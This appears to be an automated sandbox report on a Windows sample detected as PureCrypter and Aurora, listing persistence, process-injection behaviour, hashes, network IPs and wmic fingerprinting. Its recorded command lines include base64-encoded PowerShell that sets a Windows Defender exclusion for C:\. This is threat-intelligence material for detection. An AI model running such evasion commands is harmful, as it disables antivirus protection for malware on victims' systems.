Analysis Overview
SHA256
471d501162e2a5cb6aab3f4f5362ff843d05ef9f20d9fd7ea29733d3a9875747
Threat Level: Known bad
The file 5e243f79ecb539d0d1f75fce7ddfedeccee70a48 was found to be: Known bad.
Malicious Activity Summary
PureCrypter
Aurora
Detect PureCrypter injector
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-05 13:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-05 13:37
Reported
2023-02-05 13:40
Platform
win7-20220901-en
Max time kernel
91s
Max time network
50s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 6beb8a3521d42c8beb6f6a762780fbd8 |
| SHA1 | 98839d0503a2a772cfe3a84046fa1948040f5dac |
| SHA256 | 88f8fb7d596afd14c206da369ef92549be1f2afe9e3e090f527834a532ce10a8 |
| SHA512 | 37a1910df19bf5b44358e26132f70c50b7dd7cf2fdb95979b52c08ee756e88defe496a22d3242316570d8fcbe09fbee021cd77c1f44a38371a3872fcc0952dbb |
memory/1280-54-0x0000000000000000-mapping.dmp
memory/1280-56-0x00000000752B1000-0x00000000752B3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | 1ade2ffb0cb99195001374eb9291869f |
| SHA1 | 136f8615094920c993f88e0e17a7e7e3a37ade8e |
| SHA256 | 3d6d4d770fd2611dafe3e6b2c00e86b167180a8429a065d0283a432f6c4f18de |
| SHA512 | d7b054e8dbc713d82a427b5556fa3ae48309dddde8d678c80a5dfdfc1125dc61d8c53f205a9dfe6e4d4a184f4c1df0b121afc19acb3260c01549829769161698 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | effb7be7cd75b6362ed732e39e53740a |
| SHA1 | 434b758102cc35a27aa4836d8cca07374b64f4ee |
| SHA256 | cb34917a365e48fbc033108162287c96e43d133a0ee7a2b6b2375a6d8f4b4ffc |
| SHA512 | 167a973494e96139aa6ffd15d12eaf9fdc70f26cae0b3531979ab54e7aec7701b4fe358c516173a18db0eeeef258171c86ec9bc6e5e903717430c2c26e147d08 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5a0aa6da9c83bbc3bb0b0e3f129d9b63 |
| SHA1 | 347aacde3260377cac72ac2ab376df194db49bd7 |
| SHA256 | 73de6d55bb5252a701113265d37d4cee4905f0f7316bbf38cd9745b7ebe99c24 |
| SHA512 | 0adfdd98f72a8c76d3109ad0e535862cbe3b3387174b3480b2f0e75e8699220610ba6013620d9c513de6c36e684b807b91257ef5b850c2c49f668ab4cd7812e3 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e4f67f9abbc0bbd859f79230d61b0579 |
| SHA1 | 8fbaee4e938b53526aac6150cef1a5a56e5e5e47 |
| SHA256 | b46a281d150cd6ea252e2bb513ea9534009df0e453248643c3fd5da9b1a2cb45 |
| SHA512 | dc54228c61d66d1979e8d4daf5fca6cd319d73595655d84fdd41f4b51202ccb6fa0e67952230db806ce07d2de33459794fdf5ff0628414c5efc21022572361c7 |
\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 385383ea7afaff46236860d95629baa5 |
| SHA1 | 426a56190240839927ff876899cad2a7e04723d8 |
| SHA256 | 2ffb9a0d0f716e530b9bd8969cfac6696a4ac918cc075ad401d04cbc0204d1ad |
| SHA512 | ac711ee4f86826f5f8b2750545730c452d2e506e84c3e0093bf0d8f1b2e7614165499ba8768996e97068a8aae21d2840ec7184bc92fdf239eb757642e0747417 |
memory/1736-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | b17da03ddd2274ee483d704fc8b46f15 |
| SHA1 | ff707f4902bb5bccbcae5a258d10264894a9acdb |
| SHA256 | 711aa5c4d56489c41457a07b1e4c4003e030cd709822d0a351f22be4a05f6db5 |
| SHA512 | 4429322dbc8fcb6e49df9412f49a1bf82a385a91c15b48c0d60360d1edd44ccd710dedcb7f20e355a96f109e346d8db9fbf44c5edb7a6eee36ed9ecb7ed1b97d |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 0f89683cd243fde623430fd6351b8069 |
| SHA1 | 673dba0d57175d904bf012615c748de3a79988ce |
| SHA256 | df8274a6f1e5252bb7f4a4bcd3706367b03d857c62d1e14556e192aeda689d7f |
| SHA512 | d04188113380f66f084a94bb0213edba99e3f02e168dc99cbd531d76348a7311a838031a4f1e101e6735b70f4932d72a4dbe1e1fbe2021b721be3335be423937 |
memory/1736-65-0x0000000000200000-0x0000000000974000-memory.dmp
memory/1736-66-0x00000000064A0000-0x0000000006840000-memory.dmp
memory/1068-67-0x0000000000000000-mapping.dmp
memory/1068-69-0x000000006F1A0000-0x000000006F74B000-memory.dmp
memory/1068-70-0x000000006F1A0000-0x000000006F74B000-memory.dmp
memory/1068-71-0x000000006F1A0000-0x000000006F74B000-memory.dmp
memory/1104-72-0x0000000000000000-mapping.dmp
memory/1736-73-0x00000000052F0000-0x0000000005462000-memory.dmp
memory/1872-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | e8d4cc4e6b5546ce9b43d7a979d89697 |
| SHA1 | cb20e061fada675881729e6feaa945ac4a05d0ad |
| SHA256 | edef89087834afb9753aaded4b85bb4ba25a7a6b2f702325d67ab0b511384cc9 |
| SHA512 | 3385cf1a731f164a8f52753a9a59fde9694a216ef88fc87339a6455349bf4b7642275333291a92168f6cf32d8ca829329603d2f4649b127e4dca0b63187366b7 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5ac8b18822f868443c4115c89340396a |
| SHA1 | a568a9cb518796d5d4cc36dfcbeda74b5cc32077 |
| SHA256 | e4dc0df4595a843cba9e988883b2328130da400978d76b38bf4701951a1a411c |
| SHA512 | 6b06fc89f3eabc44eb240f379b47896189ca1201f70dfd9f1b6523b272b2f70d5e0923f603822187ef6dc16bdadb039baac9b488242b8d331d159d7641a3a571 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | f51807b8e4976fea474fff83e524c7d2 |
| SHA1 | 42dc7ccfe7f06d116c4208c52218a1d6e9da9900 |
| SHA256 | 4d0a0bcbe6abc2776f03f5f0817f9a897a6bf5015a71db5661da2dbb7009b989 |
| SHA512 | b3e7e45f7a2ef72660ae190b36244cf2ff52bb6a3a0e8d4d19ffad7a85bb97a39892511b3d5df238b33d7f1909533d5ca3aff04a455f7c0328edfea67bf9681c |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 46ff12adc736e041b7adc128256734d4 |
| SHA1 | 2b3f7800a64adb43356feadd679e0be91971fede |
| SHA256 | 3536424f26f49f71259efe4698eb7af9b84bcac3f288126564586e84137c31aa |
| SHA512 | ee05425034a8a6e4799fe742eb507a346186eb13b8b3fc9285b9713af25bf1b5519758404421fbbe5418903bccb5f2b19248adbb3ecc6d556dff489477a8f687 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5a1da2d0b85e6dfa46a0ccc674b3f550 |
| SHA1 | 6d3d0aa221aacbb1ec65b216bb22f11fe21ac1e7 |
| SHA256 | f64fc17ed57562eff792891813c0696f8c076675d2a9d3c893f030a28ec298b1 |
| SHA512 | 72746bf90f68f05f0796d5b3f0edf962b88ecec07895a0505ea969479a43b171b12ac4da33fb66574decff6d6bef8748baa9b188a129ce668c9be08152a1c89c |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 37f82d88e091ff26f266eebe25aa11b2 |
| SHA1 | 90f77ffa04a64e992b1e56c11bb05c492da2114e |
| SHA256 | 39b7e76f49c90bea30e0d0f69e24755a40555566a9c683b108ce4028088a7613 |
| SHA512 | cd47fccc89f96ec75bd0ac6a3f0e308d01ec8127afdc8485b607acf918c4cce2d17b462f049bb0d2fc3266c62d9bbd97d7013f58bbe5208619162270691d15ff |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 3cc12ec8f264ea2cf669599ed2c0a392 |
| SHA1 | 8bcccb8895d03955244695e86bc7f4603d4a1f5f |
| SHA256 | af456192dfc0082b60e09542ab13050b032a0e406e7741c0ea4852d011c9939c |
| SHA512 | 12b1a575a63568c45fc1077def0e68b7585edb29fd9910c4f7eef2d4c4cecc3c90c7bfaac250f08363d3ff728808d4bc2ee6980c753fdd207da3f82a2dbe3120 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 37f82d88e091ff26f266eebe25aa11b2 |
| SHA1 | 90f77ffa04a64e992b1e56c11bb05c492da2114e |
| SHA256 | 39b7e76f49c90bea30e0d0f69e24755a40555566a9c683b108ce4028088a7613 |
| SHA512 | cd47fccc89f96ec75bd0ac6a3f0e308d01ec8127afdc8485b607acf918c4cce2d17b462f049bb0d2fc3266c62d9bbd97d7013f58bbe5208619162270691d15ff |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 3cc12ec8f264ea2cf669599ed2c0a392 |
| SHA1 | 8bcccb8895d03955244695e86bc7f4603d4a1f5f |
| SHA256 | af456192dfc0082b60e09542ab13050b032a0e406e7741c0ea4852d011c9939c |
| SHA512 | 12b1a575a63568c45fc1077def0e68b7585edb29fd9910c4f7eef2d4c4cecc3c90c7bfaac250f08363d3ff728808d4bc2ee6980c753fdd207da3f82a2dbe3120 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 45022d9c99bc520b38a26ff9078e46be |
| SHA1 | b326e8b4e221ef93159043671395d635c7967d01 |
| SHA256 | 9c804d7c3806186b2638218a27d926e9e0c624910428bee12daf2cd482709128 |
| SHA512 | d2bf0aef6271e4c2b2a1240b367f40561fcfc21b0588c91e37f63d50662845333de6f57af81d35687a3a5ee09b1ac874e58c548c3b2bec892e43c8db72f3feae |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 5bb3714360c25b80651018c798ee2bf4 |
| SHA1 | bd1b213f29acf1d3b5252ff8da9da4688de1f78d |
| SHA256 | f8737b1da17e9c489fb9d7ca38f67b02e7a75cc46ce8953e61f85f6d95df42d5 |
| SHA512 | 115c9d4b73978cc3d749353ef6cc68bf6a6bade27b89d50f63a90cc703b11ebe4bf35da42a063f117f0d8c987bd5ea9ad0960331fab495b2be98e2009755087d |
memory/1872-87-0x000000006F160000-0x000000006F70B000-memory.dmp
memory/1872-88-0x000000006F160000-0x000000006F70B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-05 13:37
Reported
2023-02-05 13:40
Platform
win10v2004-20220812-en
Max time kernel
131s
Max time network
151s
Command Line
Signatures
Aurora
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5008 set thread context of 1128 | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe
"C:\Users\Admin\AppData\Local\Temp\5e243f79ecb539d0d1f75fce7ddfedeccee70a48.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
"C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
Network
| Country | Destination | Domain | Proto |
| DE | 162.19.139.184:2222 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| AU | 104.46.162.224:443 | tcp | |
| NL | 104.80.225.205:443 | tcp | |
| DE | 45.9.74.11:8081 | tcp |
Files
memory/5028-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | ba50f2bca86ba947a8d2035bb9b35123 |
| SHA1 | a542b5c5d41174dc2475a219978123b7d14f958f |
| SHA256 | 17790c5c071280462ed8e617fd2edfff5bf0f40fb9add57f866f058fdbf24cb5 |
| SHA512 | 08fdb619e411247c571710bc47df2463c95dc2fee82025e548b65ff1a3e4a53e663fafec9bcc5cc234f32211b25f6f9472786c1be543eb71629f32ec09f04379 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\voiceadequovl.exe
| MD5 | ba50f2bca86ba947a8d2035bb9b35123 |
| SHA1 | a542b5c5d41174dc2475a219978123b7d14f958f |
| SHA256 | 17790c5c071280462ed8e617fd2edfff5bf0f40fb9add57f866f058fdbf24cb5 |
| SHA512 | 08fdb619e411247c571710bc47df2463c95dc2fee82025e548b65ff1a3e4a53e663fafec9bcc5cc234f32211b25f6f9472786c1be543eb71629f32ec09f04379 |
memory/5008-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
| MD5 | 14a9737eb666769fee7c28a00eb14e82 |
| SHA1 | ab8f2279f13a546fc32233a4da0855660fb07ec0 |
| SHA256 | a5fda7973fc4b9cf7fa14943302c0b6cd81c7615105ab0031e20fc5ed2a2396a |
| SHA512 | 973d5236da1979d31376d55f6b304fa166835d99a4574e3345e25ebed5b492cf9a3ae3f0a800d137fa8756288684b6d5c07ff97c8e5c2cbb698585f09373e9e7 |
C:\Users\Admin\AppData\Roaming\Voice\voiceadequovl.exe
